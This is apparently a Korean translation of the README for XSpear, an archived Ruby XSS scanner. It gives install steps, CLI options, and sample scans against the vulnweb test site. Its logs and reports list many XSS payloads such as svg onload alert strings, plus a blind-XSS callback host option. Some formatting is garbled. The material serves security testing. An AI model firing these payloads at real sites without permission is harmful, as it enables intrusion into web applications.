
🔱 강력한 XSS 스캔 및 파라미터 분석 도구&gem
XSpear는 ruby gems 기반의 XSS 스캐너입니다
[!IMPORTANT] XSpear 저장소 보관됨
이 저장소는 보관 처리되어 읽기 전용입니다.
XSpear는 더 이상 활발히 유지보수되지 않습니다.대신 Dalfox를 사용해보세요 🌙🦊
더 빠르고 강력한 XSS 스캐너로 고급 기능을 제공합니다.
alert confirm prompt 이벤트 감지 (Selenium 사용)이벤트 핸들러 HTML 태그 특수 문자 유용한 코드CSP HSTS X-frame-options, XSS-protection 등)테이블 기반 CLI 보고서 및 , 표시다음과 같이 직접 설치하세요:
$ gem install XSpear
또는 다음과 같이 직접 설치하세요 (로컬 파일 / 최신 릴리스 다운로드):
$ gem install XSpear-{version}.gem
애플리케이션의 Gemfile에 다음 줄을 추가하세요:```ruby gem 'XSpear'
그런 다음 실행하세요:
$ bundle
### 종속성 젬
`colorize` `selenium-webdriver` `terminal-table` `progress_bar`<br>
Gem 라이브러리에 자동 설치하도록 설정했지만 비정상적으로 동작한다면, 다음 명령어로 설치하세요.```
$ gem install colorize
$ gem install selenium-webdriver
$ gem install terminal-table
$ gem install progress_bar
Usage: xspear -u [target] -[options] [value] [ e.g ] $ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a $ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 2 $ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 0 -o json
[ Options ] -u, --url=target_URL [required] Target Url -d, --data=POST Body [optional] POST Method Body data -a, --test-all-params [optional] test to all params(include not reflected) --no-xss [optional] no testing xss, only parameters analysis --headers=HEADERS [optional] Add HTTP Headers --cookie=COOKIE [optional] Add Cookie --custom-payload=FILENAME [optional] Load custom payload json file --raw=FILENAME [optional] Load raw file(e.g raw_sample.txt) -p, --param=PARAM [optional] Test paramters -b, --BLIND=URL [optional] Add vector of Blind XSS + with XSS Hunter, ezXSS, HBXSS, etc... + e.g : -b https://hahwul.xss.ht -t, --threads=NUMBER [optional] thread , default: 10 -o, --output=FORMAT [optional] Output format (cli , json) -c, --config=FILENAME [optional] Using config.json -v, --verbose=0~3 [optional] Show log depth + v=0 : quite mode(only result) + v=1 : show scanning status(default) + v=2 : show scanning logs + v=3 : show detail log(req/res) -h, --help Prints this help --version Show XSpear version --update Show how to update
### 결과 유형
- (I)NFO: 정보 획득 (예: SQL 오류, 필터링된 규칙, 반영된 파라미터 등)
- (V)UNL: 취약한 XSS, Selenium을 통해 확인된 alert/prompt/confirm
- (L)OW: 낮은 수준 이슈
- (M)EDIUM: 중간 수준 이슈
- (H)IGH: 높은 수준 이슈
### 상세 모드
**[0] 조용한 모드(결과만 표시)**```
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 0
you see report
[1] 진행 표시줄 표시 (기본값)``` $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 1 [] analysis request.. [] used test-reflected-params mode(default) [] creating a test query [for reflected 2 param + blind XSS ] [] test query generation is complete. [249 query] [*] starting XSS Scanning. [10 threads]
[#######################################] [249/249] [100.00%] [01:05] [00:00] [ 3.83/s] ... you see report
**[2] 스캔 로그 보기**```
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2
[*] analysis request..
[I] [22:42:41] [200/OK] [param: cat][Found SQL Error Pattern]
[-] [22:42:41] [200/OK] 'STATIC' not reflected
[-] [22:42:41] [200/OK] 'cat' not reflected <script>alert(45)</script>
[I] [22:42:41] [200/OK] reflected rEfe6[param: cat][reflected parameter]
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 2 param + blind XSS ]
[*] test query generation is complete. [249 query]
[*] starting XSS Scanning. [10 threads]
[I] [22:42:43] [200/OK] reflected onhwul=64[param: cat][reflected EHon{any} pattern]
[-] [22:42:54] [200/OK] 'cat' not reflected
[-] [22:42:54] [200/OK] 'cat' not reflected <svg/onload=alert(45)>
[H] [22:42:54] [200/OK] reflected <script>alert(45)</script>[param: cat][reflected XSS Code]
[V] [22:42:59] [200/OK] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>[param: cat][triggered <svg/onload=alert(45)>]
...
you see report
[3] 스캔 상세 로그 표시``` $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 3 [] analysis request.. [-] [22:56:21] [200/OK] http://testphp.vulnweb.com/listproducts.php?cat=123 in url [ Request ] {"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["/"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]} [ Response ] {"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:53:23 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]} [-] [22:56:21] [200/OK] 'STATIC' not reflected [-] [22:56:21] [200/OK] cat=123rEfe6 in url ... [] used test-reflected-params mode(default) [] creating a test query [for reflected 2 param + blind XSS ] [] test query generation is complete. [249 query] [] starting XSS Scanning. [10 threads] ... [ Request ] {"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["/*"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]} [ Response ] {"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:54:36 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]} [H] [22:57:33] [200/OK] reflected [param: cat][reflected onfocus XSS Code] ... you see report
### 사례별로
**XSS 스캐닝**```
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
JSON 출력만``` $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 0
**스캔 스레드 설정**```
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30
선택된 매개변수에서 테스트``` $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test
**모든 매개변수에서 테스트**<br>
(이 옵션은 reflection 여부와 관계없이 테스트됩니다.)```
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -a
테스트 전용 매개변수 분석 (일명 no-xss 모드)
```
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" --no-xss
**blind xss(all params) 테스트**<br>
(Blind XSS가 어디에나 있으므로 가능한 한 많이 사용해야 합니다)<br>```
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht" -a
# Set your blind xss host. <-b options>
커스텀 페이로드 테스트
```
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" --custom-payload=custom_payload.json
custom_payload.json 파일에서```json
[
{
"payload":"<svg/onload=alert(1)>",
"callback":"P1",
"descript":"blahblah~"
},
{
"payload":"<svg/onload=alert(1)>",
"callback":"P2",
"descript":"blahblah~"
},
{
"payload":"<>",
"callback":"P1",
"descript":"blahblah~"
}
]
Pipeline용
```
$ xspear -u {target} -b "your-blind-xss-host" -a -v 0 -o json
결과 json data```
{
"starttime": "2019-12-25 00:02:58 +0900",
"endtime": "2019-12-25 00:03:31 +0900",
"issue_count": 25,
"issue_list": [{
"id": 0,
"type": "INFO",
"issue": "DYNAMIC ANALYSIS",
"method": "GET",
"param": "cat",
"payload": "XsPeaR\"",
"description": "Found SQL Error Pattern"
}, {
"id": 1,
"type": "INFO",
"issue": "STATIC ANALYSIS",
"method": "GET",
"param": "-",
"payload": "<original query>",
"description": "Found Server: nginx/1.4.1"
}, {
"id": 2,
"type": "INFO",
"issue": "STATIC ANALYSIS",
"method": "GET",
"param": "-",
"payload": "<original query>",
"description": "Not set HSTS"
}, {
"id": 3,
"type": "INFO",
"issue": "STATIC ANALYSIS",
"method": "GET",
"param": "-",
"payload": "<original query>",
"description": "Content-Type: text/html"
}, {
"id": 4,
"type": "LOW",
"issue": "STATIC ANALYSIS",
"method": "GET",
"param": "-",
"payload": "<original query>",
"description": "Not Set X-Frame-Options"
}, {
"id": 5,
"type": "MIDUM",
"issue": "STATIC ANALYSIS",
"method": "GET",
"param": "-",
"payload": "<original query>",
"description": "Not Set CSP"
}, {
"id": 6,
"type": "INFO",
"issue": "REFLECTED",
"method": "GET",
"param": "cat",
"payload": "rEfe6",
"description": "reflected parameter"
}, {
"id": 7,
"type": "INFO",
"issue": "FILERD RULE",
"method": "GET",
"param": "cat",
"payload": "onhwul=64",
"description": "not filtered event handler on{any} pattern"
}
....
, {
"id": 17,
"type": "HIGH",
"issue": "XSS",
"method": "GET",
"param": "cat",
"payload": "<audio src onloadstart=alert(45)>",
"description": "reflected HTML5 XSS Code"
}, {
"id": 18,
"type": "HIGH",
"issue": "XSS",
"method": "GET",
"param": "cat",
"payload": "<keygen autofocus onfocus=alert(45)>",
"description": "reflected onfocus XSS Code"
....
}, {
"id": 24,
"type": "HIGH",
"issue": "XSS",
"method": "GET",
"param": "cat",
"payload": "<marquee onstart=alert(45)>",
"description": "triggered <marquee onstart=alert(45)>"
}]
}
(triggered로 표시된 항목은 실제로 브라우저에서 작동하는 페이로드입니다.)
XSpear on Burpsuite
https://github.com/hahwul/XSpear/tree/master/forBurp
etc...
XSS 스캐닝```
xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=z"
) (
( /( )\ )
)())(()/( ( ) (
(()\ /())` ) ))\ ( /( )(
__(()()) /(/( /(())())(()
\ / // |(()\ ()) (() (()
< __ | '_ )/ -_)/ _
|| '_| /_/\_\|___/| .__/ \___|\__,_||_| /> |_| \ /< {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================- / \< \> [ v1.4.0 ] [*] analysis request.. [*] used test-reflected-params mode(default) [*] creating a test query [for reflected 1 param ] [*] test query generation is complete. [251 query] [*] starting XSS Scanning. [10 threads] ...snip... [*] finish scan. the report is being generated.. +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+ | [ XSpear report ] | | http://testphp.vulnweb.com/listproducts.php?cat=123&zfdfasdf=124fff... (snip) | | 2019-08-14 23:50:34 +0900 ~ 2019-08-14 23:51:07 +0900 Found 24 issues. | +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+ | NO | TYPE | ISSUE | METHOD | PARAM | PAYLOAD | DESCRIPTION | +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+ | 0 | INFO | STATIC ANALYSIS | GET | - | <original query> | Found Server: nginx/1.4.1 | | 1 | INFO | STATIC ANALYSIS | GET | - | <original query> | Not set HSTS | | 2 | INFO | STATIC ANALYSIS | GET | - | <original query> | Content-Type: text/html | | 3 | LOW | STATIC ANALYSIS | GET | - | <original query> | Not Set X-Frame-Options | | 4 | MIDUM | STATIC ANALYSIS | GET | - | <original query> | Not Set CSP | | 5 | INFO | DYNAMIC ANALYSIS | GET | cat | XsPeaR" | Found SQL Error Pattern | | 6 | INFO | REFLECTED | GET | cat | rEfe6 | reflected parameter | | 7 | INFO | FILERD RULE | GET | cat | onhwul=64 | not filtered event handler on{any} pattern | | 8 | HIGH | XSS | GET | cat | <script>alert(45)</script> | reflected XSS Code | | 9 | HIGH | XSS | GET | cat | <marquee onstart=alert(45)> | reflected HTML5 XSS Code | | 10 | HIGH | XSS | GET | cat | <details/open/ontoggle="alert45`"> | reflected HTML5 XSS Code | | 11 | HIGH | XSS | GET | cat | | reflected onfocus XSS Code | | 12 | HIGH | XSS | GET | cat | | reflected onfocus XSS Code | | 13 | HIGH | XSS | GET | cat | | reflected onfocus XSS Code | | 14 | HIGH | XSS | GET | cat | <audio src onloadstart=alert(45)> | reflected HTML5 XSS Code | | 15 | HIGH | XSS | GET | cat | <meter onmouseover=alert(45)>0 | reflected HTML5 XSS Code | | 16 | HIGH | XSS | GET | cat | "> | reflected XSS Code | | 17 | HIGH | XSS | GET | cat | <video controls/poster/onerror=alert(45)> | reflected HTML5 XSS Code | | 18 | HIGH | XSS | GET | cat | | reflected onfocus XSS Code | | 19 | VULN | XSS | GET | cat | alert(45) | triggered | | 20 | HIGH | XSS | GET | cat | | triggered | | 21 | HIGH | XSS | GET | cat | <details/open/ontoggle="alert(45)"> | triggered <details/open/ontoggle="alert(45)"> | | 22 | HIGH | XSS | GET | cat | | triggered | | 23 | VULN | XSS | GET | cat | '"><svg/onload=alert(45)> | triggered <svg/onload=alert(45)> | +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+ < Available Objects > [cat] param
필터 규칙테스트 원시 쿼리(url)cli json html
< Raw Query > [0] http://testphp.vulnweb.com/listproducts.php?- ..snip.. [19] http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Cscript%3Ealert(45)%3C/script%3E&zfdfasdf=124fffff [20] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cmarquee%20onstart=alert(45)%3E&zfdfasdf=124fffff [21] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cdetails/open/ontoggle=%22alert(45)%22%3E&zfdfasdf=124fffff [22] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Caudio%20src%20onloadstart=alert(45)%3E&zfdfasdf=124fffff [23] http://testphp.vulnweb.com/listproducts.php?cat=123'%22%3E%3Csvg/onload=alert(45)%3E&zfdfasdf=124fffff
...snip...
**JSON으로 변환**```
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123&zfdfasdf=124fffff" -v 1 -o json
{"starttime":"2019-08-14 23:58:12 +0900","endtime":"2019-08-14 23:58:44 +0900","issue_count":24,"issue_list":[{"id":0,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Found Server: nginx/1.4.1"},{"id":1,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not set HSTS"},{"id":2,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Content-Type: text/html"},{"id":3,"type":"LOW","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set X-Frame-Options"},{"id":4,"type":"MIDUM","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set CSP"},{"id":5,"type":"INFO","issue":"DYNAMIC ANALYSIS","method":"GET","param":"cat","payload":"XsPeaR\"","description":"Found SQL Error Pattern"},{"id":6,"type":"INFO","issue":"REFLECTED","method":"GET","param":"cat","payload":"rEfe6","description":"reflected parameter"},{"id":7,"type":"INFO","issue":"FILERD RULE","method":"GET","param":"cat","payload":"onhwul=64","description":"not filtered event handler on{any} pattern"},{"id":8,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"reflected XSS Code"},{"id":9,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<textarea autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":10,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<video controls/poster/onerror=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":11,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":12,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert`45`\">","description":"reflected HTML5 XSS Code"},{"id":13,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<select autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":14,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":15,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<input autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":16,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"\">","description":"reflected XSS Code"},{"id":17,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<meter onmouseover=alert(45)>0</meter>","description":"reflected HTML5 XSS Code"},{"id":18,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<keygen autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":19,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"triggered <audio src onloadstart=alert(45)>"},{"id":20,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"triggered <marquee onstart=alert(45)>"},{"id":21,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert(45)\">","description":"triggered <details/open/ontoggle=\"alert(45)\">"},{"id":22,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"triggered <script>alert(45)</script>"},{"id":23,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"'\"><svg/onload=alert(45)>","description":"triggered <svg/onload=alert(45)>"}]}
require 'XSPear'
options = {} options['thread'] = 30 options['cookie'] = "data=123" options['blind'] = "https://hahwul.xss.ht" options['output'] = json
s = XspearScan.new "https://www.hahwul.com?target_url", options
s.run result = s.report.to_json r = JSON.parse result
## 스캐닝 모듈 추가
**1) `makeQueryPattern` 추가**```ruby
makeQueryPattern('type', 'query,', 'pattern', 'category', "description", "callback funcion")
# type: f(ilterd?) r(eflected?) x(ss?)
# category i(nfo) v(uln) l(ow) m(edium) h(igh)
# e.g
# makeQueryPattern('f', 'XsPeaR,', 'XsPeaR,', 'i', "not filtered "+",".blue, CallbackStringMatch)
2) 다른 콜백이 있는 경우, ScanCallbackFunc를 재정의하는 콜백 클래스를 작성하세요
예:
class MyCallback(ScanCallbackFunc):
``````ruby
class CallbackStringMatch < ScanCallbackFunc
def run
if @response.body.include? @query
[true, "reflected #{@query}"]
else
[false, "not reflected #{@query}"]
end
end
end
부모 클래스(ScanCallbackFunc)```ruby class ScanCallbackFunc() def initialize(url, method, query, response) @url = url @method = method @query = query @response = response # self.run end
def run
# override
end
end
Common Callback Class
- CallbackXSSSelenium
- CallbackErrorPatternMatch
- CallbackCheckHeaders
- CallbackStringMatch
- CallbackNotAdded
- etc...
## 업데이트
일반 사용자의 경우```
$ gem update XSpear
만약 개발자 (소프트)``` $ git pull -v
만약 개발자들 (어려움)```
$ git reset --hard HEAD; git pull -v
저장소를 클론한 후, bin/setup을 실행하여 의존성을 설치하세요. 그런 다음 rake spec을 실행하여 테스트를 실행하세요. 또한 bin/console을 실행하여 실험할 수 있는 대화형 프롬프트를 사용할 수 있습니다.
이 젬을 로컬 머신에 설치하려면 bundle exec rake install을 실행하세요. 새 버전을 배포하려면 version.rb에서 버전 번호를 업데이트한 후, bundle exec rake release를 실행하면 git 태그가 생성되고, git 커밋과 태그가 푸시되며, .gem 파일이 rubygems.org로 푸시됩니다.
버그 리포트와 풀 리퀘스트는 GitHub https://github.com/hahwul/XSpear 에서 환영합니다. 이 프로젝트는 협업을 위한 안전하고 환영하는 공간을 지향하며, 기여자는 Contributor Covenant 행동 강령을 준수해야 합니다.
이 젬은 MIT 라이선스 조건에 따라 오픈 소스로 제공됩니다.
XSpear 프로젝트의 코드베이스, 이슈 트래커, 채팅방 및 메일링 리스트에서 상호 작용하는 모든 사람은 행동 강령을 따라야 합니다.
< 스캔 이미지>
< CLI 리포트 1 >
< CLI 리포트 2 >
< JSON 리포트 >
< HTML 리포트 >
